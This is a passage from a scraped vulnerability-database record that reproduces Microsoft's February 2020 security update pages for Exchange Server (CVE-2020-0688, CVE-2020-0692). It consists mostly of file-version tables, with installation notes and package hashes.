.76</td><td>40,288</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsmcw.dll</td><td>8.5.3.76</td><td>44,384</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsmdb.dll</td><td>8.5.3.76</td><td>45,920</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsmif.dll</td><td>8.5.3.76</td><td>217,952</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsmime.dll</td><td>8.5.3.76</td><td>135,008</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsmm.dll</td><td>8.5.3.76</td><td>34,144</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsmm4.dll</td><td>8.5.3.76</td><td>36,192</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsmmfn.dll</td><td>8.5.3.76</td><td>31,072</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsmp.dll</td><td>8.5.3.76</td><td>29,536</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsmpp.dll</td><td>8.5.3.76</td><td>249,696</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsmsg.dll</td><td>8.5.3.76</td><td>96,096</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsmsw.dll</td><td>8.5.3.76</td><td>46,432</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsmwkd.dll</td><td>8.5.3.76</td><td>26,464</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsmwks.dll</td><td>8.5.3.76</td><td>25,440</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsmwp2.dll</td><td>8.5.3.76</td><td>49,504</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsmwpf.dll</td><td>8.5.3.76</td><td>34,656</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsmwrk.dll</td><td>8.5.3.76</td><td>27,488</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsnsf.dll</td><td>8.5.3.76</td><td>38,240</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsolm.dll</td><td>8.5.3.76</td><td>153,952</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsone.dll</td><td>8.5.3.76</td><td>81,760</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsow.dll</td><td>8.5.3.76</td><td>24,928</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vspbm.dll</td><td>8.5.3.76</td><td>24,928</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vspcl.dll</td><td>8.5.3.76</td><td>23,392</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vspcx.dll</td><td>8.5.3.76</td><td>29,024</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vspdf.dll</td><td>8.5.3.76</td><td>260,448</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vspdfi.dll</td><td>8.5.3.76</td><td>278,368</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vspdx.dll</td><td>8.5.3.76</td><td>31,584</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vspfs.dll</td><td>8.5.3.76</td><td>41,312</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vspgl.dll</td><td>8.5.3.76</td><td>59,744</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vspic.dll</td><td>8.5.3.76</td><td>25,440</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vspict.dll</td><td>8.5.3.76</td><td>55,136</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vspng.dll</td><td>8.5.3.76</td><td>53,600</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vspntg.dll</td><td>8.5.3.76</td><td>22,880</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vspp12.dll</td><td>8.5.3.76</td><td>131,936</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vspp2.dll</td><td>8.5.3.76</td><td>72,032</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vspp7.dll</td><td>8.5.3.76</td><td>77,664</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vspp97.dll</td><td>8.5.3.76</td><td>227,680</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsppl.dll</td><td>8.5.3.76</td><td>39,264</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vspsd.dll</td><td>8.5.3.76</td><td>23,904</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vspsp6.dll</td><td>8.5.3.76</td><td>189,792</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vspst.dll</td><td>8.5.3.76</td><td>82,272</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vspstf.dll</td><td>8.5.3.76</td><td>35,168</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsqa.dll</td><td>8.5.3.76</td><td>29,536</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsqad.dll</td><td>8.5.3.76</td><td>35,168</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsqp6.dll</td><td>8.5.3.76</td><td>53,600</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsqp9.dll</td><td>8.5.3.76</td><td>76,128</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsqt.dll</td><td>8.5.3.76</td><td>35,168</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsrar.dll</td><td>8.5.3.76</td><td>141,152</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsras.dll</td><td>8.5.3.76</td><td>24,416</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsrbs.dll</td><td>8.5.3.76</td><td>35,168</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsrft.dll</td><td>8.5.3.76</td><td>36,192</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsrfx.dll</td><td>8.5.3.76</td><td>31,584</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsriff.dll</td><td>8.5.3.76</td><td>28,000</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsrtf.dll</td><td>8.5.3.76</td><td>171,872</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vssam.dll</td><td>8.5.3.76</td><td>29,024</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vssc5.dll</td><td>8.5.3.76</td><td>32,608</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vssdw.dll</td><td>8.5.3.76</td><td>29,536</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsshw3.dll</td><td>8.5.3.76</td><td>40,288</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vssmd.dll</td><td>8.5.3.76</td><td>27,488</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vssms.dll</td><td>8.5.3.76</td><td>28,000</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vssmt.dll</td><td>8.5.3.76</td><td>33,632</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vssnap.dll</td><td>8.5.3.76</td><td>31,072</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsso6.dll</td><td>8.5.3.76</td><td>306,016</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vssoc.dll</td><td>8.5.3.76</td><td>43,360</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vssoc6.dll</td><td>8.5.3.76</td><td>285,536</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vssoi.dll</td><td>8.5.3.76</td><td>40,800</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vssoi6.dll</td><td>8.5.3.76</td><td>304,992</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vssow.dll</td><td>8.5.3.76</td><td>34,144</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vsspt.dll</td><td>8.5.3.76</td><td>28,000</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vsssml.dll</td><td>8.5.3.76</td><td>29,024</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vsswf.dll</td><td>8.5.3.76</td><td>34,144</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vstaz.dll</td><td>8.5.3.76</td><td>36,192</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vstext.dll</td><td>8.5.3.76</td><td>35,168</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vstga.dll</td><td>8.5.3.76</td><td>26,976</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vstif6.dll</td><td>8.5.3.76</td><td>103,776</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vstw.dll</td><td>8.5.3.76</td><td>34,144</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vstxt.dll</td><td>8.5.3.76</td><td>38,752</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vsvcrd.dll</td><td>8.5.3.76</td><td>82,272</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vsviso.dll</td><td>8.5.3.76</td><td>205,664</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vsvsdx.dll</td><td>8.5.3.76</td><td>47,456</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vsvw3.dll</td><td>8.5.3.76</td><td>29,024</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vsw12.dll</td><td>8.5.3.76</td><td>221,536</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vsw6.dll</td><td>8.5.3.76</td><td>138,080</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vsw97.dll</td><td>8.5.3.76</td><td>236,896</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vswbmp.dll</td><td>8.5.3.76</td><td>22,368</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vswg2.dll</td><td>8.5.3.76</td><td>47,968</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vswk4.dll</td><td>8.5.3.76</td><td>103,264</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vswk6.dll</td><td>8.5.3.76</td><td>154,464</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vswks.dll</td><td>8.5.3.76</td><td>48,480</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vswm.dll</td><td>8.5.3.76</td><td>30,048</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vswmf.dll</td><td>8.5.3.76</td><td>45,920</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vswml.dll</td><td>8.5.3.76</td><td>68,960</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vsword.dll</td><td>8.5.3.76</td><td>86,880</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vswork.dll</td><td>8.5.3.76</td><td>36,192</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vswp5.dll</td><td>8.5.3.76</td><td>75,616</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vswp6.dll</td><td>8.5.3.76</td><td>107,360</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vswpf.dll</td><td>8.5.3.76</td><td>30,560</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vswpg.dll</td><td>8.5.3.76</td><td>48,480</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vswpg2.dll</td><td>8.5.3.76</td><td>57,184</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vswpl.dll</td><td>8.5.3.76</td><td>39,264</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vswpml.dll</td><td>8.5.3.76</td><td>29,024</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vswpw.dll</td><td>8.5.3.76</td><td>68,448</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vsws.dll</td><td>8.5.3.76</td><td>37,728</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vsws2.dll</td><td>8.5.3.76</td><td>29,024</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vsxl12.dll</td><td>8.5.3.76</td><td>261,472</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vsxl5.dll</td><td>8.5.3.76</td><td>289,632</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vsxlsb.dll</td><td>8.5.3.76</td><td>244,064</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vsxml.dll</td><td>8.5.3.76</td><td>31,584</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vsxmp.dll</td><td>8.5.3.76</td><td>22,368</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vsxps.dll</td><td>8.5.3.76</td><td>51,552</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vsxy.dll</td><td>8.5.3.76</td><td>35,680</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vsyim.dll</td><td>8.5.3.76</td><td>30,560</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Vszip.dll</td><td>8.5.3.76</td><td>27,488</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Watson.config.xml</td><td>Not applicable</td><td>36,442</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Web.config_053c31bdd6824e95b35d61b0a5e7b62d</td><td>Not applicable</td><td>143,640</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Web.config_cb9a6ac9d1164e879b0b2887c9452d4f</td><td>Not applicable</td><td>137,151</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Webreadyview.aspx</td><td>Not applicable</td><td>1,061</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Webreadyviewbody.aspx</td><td>Not applicable</td><td>1,292</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Webreadyviewhead.aspx</td><td>Not applicable</td><td>7,406</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Wizardproperties.js</td><td>Not applicable</td><td>189,547</td><td>03-Jan-2020</td><td>05:46</td><td>Not applicable</td></tr><tr><td>Wizcmd.exe</td><td>14.3.470.0</td><td>29,896</td><td>03-Jan-2020</td><td>05:49</td><td>x86</td></tr><tr><td>Wsbexchange.exe</td><td>14.3.470.0</td><td>131,496</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Wvcore.dll</td><td>8.5.3.76</td><td>3,251,040</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>X400prox.dll</td><td>14.3.470.0</td><td>105,392</td><td>03-Jan-2020</td><td>05:45</td><td>x64</td></tr><tr><td>_02bdcebd3d694db585f8e38f74a7767e_premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>_083c0d59e0a749f2b10174c00cb6727e_premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>_24d2e35f00d7423c902e58d04c126642_premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>_3184a6f4759943848cf58593791ac971_premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>_3539f8afe1684c36847f808f0c76d024_premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>_486632cb7cbe412b8a2954012f7e9c7f_premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>_50ca03193abf48aca295b3ec864fcd68_premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>_545db0f907844150956a0c069a3a0556_premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>_5e224a55a0fa465e817e18cec8854723_premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>_64f60ad194cd4344bca49df649ac7b36_premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>_68e440eb9ffa4b54b3d7490524f7f878_premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>_6b0d5c59049a498aa09173d08300a443_premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>_71a730c62e764989bd2b2d205dd874b4_premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>_756c11efe6574dba874273443609eb8b_premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>_791aef9789df465da46941ee38757a31_premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>_7b9793f8_5acd_4ef8_83a6_46e957c909a0_error.aspx</td><td>Not applicable</td><td>8,363</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>_7e3dc44156954eacac20b5767cd0ebd7_premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>_81ebbb77ed854ee784951876098c52e9_premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>_9495e7eba02649c6a26bea7209a2f1e1_premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>_9e665be76e144ac89a7d8b37611b752e_premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr></tbody></table></div></div></div><h2>How to get help and support for this security update</h2><p>Protect yourself online: <a data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/hub/4099151\" managed-link=\"\" target=\"_blank\">Windows Security support</a></p><p>Learn how we guard against cyber threats: <a href=\"https://www.microsoft.com/security\" managed-link=\"\" target=\"_blank\">Microsoft Security</a></p></body></html>", "edition": 4, "modified": "2020-02-13T16:33:55", "id": "KB4536989", "href": "https://support.microsoft.com/en-us/help/4536989/", "published": "2020-02-11T00:00:00", "title": "Description of the security update for Microsoft Exchange Server 2010: February 11, 2020", "type": "mskb", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:48:45", "bulletinFamily": "microsoft", "cvelist": ["CVE-2020-0688", "CVE-2020-0692"], "description": "<html><body><p>Description of the security update for Microsoft Exchange Server 2019 and 2016: February 11, 2020</p><h2></h2><p>This update rollup is a security update that\u00a0resolves vulnerabilities in Microsoft Exchange Server. To learn more about these vulnerabilities, see the following Common Vulnerabilities and Exposures (CVE):</p><ul><li><a href=\"https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-0692\" managed-link=\"\" target=\"_blank\">CVE-2020-0692 | Microsoft Exchange Server Elevation of Privilege Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-0688\" managed-link=\"\" target=\"_blank\">CVE-2020-0688 | Microsoft Exchange Memory Corruption Vulnerability</a></li></ul><h2>Known issues in this security update</h2><ul><li><p>When you try to manually install this security update by double-clicking the update file (.msp) to run it in Normal mode\u00a0(that is, not as an administrator), some files are not correctly updated.</p><p>When this issue occurs, you don\u2019t receive an error message or any indication that the security update was not correctly installed. However, Outlook Web Access (OWA) and the Exchange Control Panel (ECP) may stop working.<br/><br/>This issue occurs on servers that are using user account control (UAC). The issue occurs because the security update doesn\u2019t correctly stop certain Exchange-related services.</p><p>To avoid this issue, follow these steps to manually install this security update:</p><ol><li>Select <strong>Start</strong>, and type\u00a0<strong>cmd</strong>.</li><li>In the results, right-click <strong>Command Prompt</strong>, and then select <strong>Run as administrator</strong>.</li><li>If the <strong>User Account Control</strong> dialog box appears, verify that the default action is the action that you want, and then select <strong>Continue</strong>.</li><li>Type the full path of the .msp file, and then press Enter.</li></ol><p>This issue does not occur when you install the update through Microsoft Update.</p></li><li><p>Exchange services may remain in a disabled state after you install this security update. This condition does not indicate that the update is not installed correctly. This condition may occur if the service control scripts experience a problem when they try to return Exchange services to their\u00a0usual state.<br/><br/>To fix this issue, use Services Manager to restore the startup type to <strong>Automatic</strong>, and then start the affected Exchange services manually. To avoid this issue, run the security update at an elevated command prompt. For more information about how to open an elevated Command Prompt window, see\u00a0<a data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/en-us/library/cc947813(v=ws.10).aspx\" managed-link=\"\" target=\"_blank\">Start a Command Prompt as an Administrator</a>.</p></li></ul><h2>How to get and install the update</h2><h3>Method 1: Microsoft Update</h3><p>This update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically.\u00a0<span><span>For more information about how to turn on automatic updating, see </span></span> <a data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/help/12373/windows-update-faq\" managed-link=\"\" target=\"_blank\">Windows Update: FAQ</a>.</p><h3>Method 2: Microsoft Update Catalog</h3><p>To get the standalone package for this update, go to the\u00a0<a data-content-id=\"\" data-content-type=\"\" href=\"http://www.catalog.update.microsoft.com/Search.aspx?q=KB4536987\" managed-link=\"\" target=\"_blank\">Microsoft Update Catalog</a>\u00a0website.</p><h3>Method 3: Microsoft Download Center</h3><p>You can get the standalone update package through the Microsoft Download Center.</p><ul linespacing=\"1\" style=\"list-style-type:UnorderedBullets\" type=\"UnorderedBullets\"><li><span asset=\"4009805\" contenteditable=\"false\" props='{\"size\":\"full\"}' unselectable=\"on\">4009805</span><a data-content-id=\"\" data-content-type=\"\" href=\"http://www.microsoft.com/download/details.aspx?familyid=6f5e2305-f1dc-4ce9-97c5-4d6fc1b87a24\" managed-link=\"\" target=\"_blank\">Download Security Update For Exchange Server 2019 Cumulative Update 4 (KB4536987)</a></li><li><span asset=\"4009805\" contenteditable=\"false\" props='{\"size\":\"full\"}' unselectable=\"on\">4009805</span><a data-content-id=\"\" data-content-type=\"\" href=\"http://www.microsoft.com/download/details.aspx?familyid=dec0d147-8b43-4fee-94cb-ed43ed1226ad\" managed-link=\"\" target=\"_blank\">Download Security Update For Exchange Server 2019 Cumulative Update 3 (KB4536987)</a></li><li><span asset=\"4009805\" contenteditable=\"false\" props='{\"size\":\"full\"}' unselectable=\"on\">4009805</span><a data-content-id=\"\" data-content-type=\"\" href=\"http://www.microsoft.com/download/details.aspx?familyid=a4bd9a4e-56f4-42c2-b0d7-fffe52c5dbe5\" managed-link=\"\" target=\"_blank\">Download Security Update For Exchange Server 2016 Cumulative Update 15 (KB4536987)</a></li><li><span asset=\"4009805\" contenteditable=\"false\" props='{\"size\":\"full\"}' unselectable=\"on\">4009805</span><a data-content-id=\"\" data-content-type=\"\" href=\"http://www.microsoft.com/download/details.aspx?familyid=5ae7346b-f59c-415d-b576-e50f6b493a23\" managed-link=\"\" target=\"_blank\">Download Security Update For Exchange Server 2016 Cumulative Update 14 (KB4536987)</a></li></ul><h2>More information</h2><h3>Security update deployment information</h3><p>For deployment information about this update, see\u00a0<a aria-live=\"rude\" data-bi-name=\"content-anchor-link\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/help/20200211\" managed-link=\"\" tabindex=\"0\" target=\"_blank\">security update deployment information: February 11, 2020</a>.\u00a0</p><h3>Security update replacement information</h3><p>This security update replaces the following previously released updates:</p><ul><li><a data-content-id=\"4523171\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">Description of the security update for Microsoft Exchange Server 2016, and 2019: November 12, 2019</a></li></ul><h2>File information</h2><h3>File hash information</h3><table class=\"table\"><tbody><tr><th>Update name</th><th>File name</th><th>SHA1 hash</th><th>SHA256 hash</th></tr><tr><td>Exchange Server 2019 Cumulative Update 4</td><td>Exchange2019-KB4536987-x64-en.msp</td><td>F040FFC72F38658BC9B77DF8E368698B70CB825C</td><td>774A68E5B4462A6807B34AACD1ABE36901A31C6B1C7AD0270225A2C0C62B2478</td></tr><tr><td>Exchange Server 2019 Cumulative Update 3</td><td>Exchange2019-KB4536987-x64-en.msp</td><td>F936D367F8AD3F8965BFDDB61FFCFF3BFC107013</td><td>78851F1ECD036A768181F9938CF9CFF79FE3D0BD45A4132A22C3587B7D9379C2</td></tr><tr><td>Exchange Server 2016 Cumulative Update 15</td><td>Exchange2016-KB4536987-x64-en.msp</td><td>864C4A38668A914A4F75DDF679555CFB8F0D4065</td><td>6DC7F1CEBCDBCA95FE33C2168426B0AC8BD14F31079B12C759A68F35F6FC3352</td></tr><tr><td>Exchange Server 2016 Cumulative Update 14</td><td>Exchange2016-KB4536987-x64-en.msp</td><td>68E8E81FB24045AE4EA18862B744BCF5A2CCAE6E</td><td>68D642697F7BE93E5070DB0B198918C43D6B05BA7FC62D2322A2C6FE8BB9D171</td></tr></tbody></table><h3>Exchange server file information</h3><p>The English (United States) version of this update installs files that have the attributes that are listed in the following tables. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight-saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.</p><div contenteditable=\"false\" tabindex=\"-1\"><div class=\"faq-section\" data-widget=\"collapsible\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\">Exchange Server 2019 Cumulative Update 4</span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><table class=\"table\"><tbody><tr><th>File name</th><th>File version</th><th>File size</th><th>Date</th><th>Time</th><th>Platform</th></tr><tr><td>Activemonitoringeventmsg.dll</td><td>15.2.529.8</td><td>71,032</td><td>01-Jan-2020</td><td>11:20</td><td>x64</td></tr><tr><td>Activemonitoringexecutionlibrary.ps1</td><td>Not applicable</td><td>29,802</td><td>01-Jan-2020</td><td>11:22</td><td>Not applicable</td></tr><tr><td>Adduserstopfrecursive.ps1</td><td>Not applicable</td><td>14,925</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Ademodule.dll</td><td>15.2.529.8</td><td>106,368</td><td>01-Jan-2020</td><td>11:20</td><td>x64</td></tr><tr><td>Airfilter.dll</td><td>15.2.529.8</td><td>42,872</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Ajaxcontroltoolkit.dll</td><td>15.2.529.8</td><td>92,752</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Antispamcommon.ps1</td><td>Not applicable</td><td>13,485</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Asdat.msi</td><td>Not applicable</td><td>5,087,232</td><td>01-Jan-2020</td><td>11:22</td><td>Not applicable</td></tr><tr><td>Asentirs.msi</td><td>Not applicable</td><td>77,824</td><td>01-Jan-2020</td><td>11:22</td><td>Not applicable</td></tr><tr><td>Asentsig.msi</td><td>Not applicable</td><td>73,728</td><td>01-Jan-2020</td><td>11:21</td><td>Not 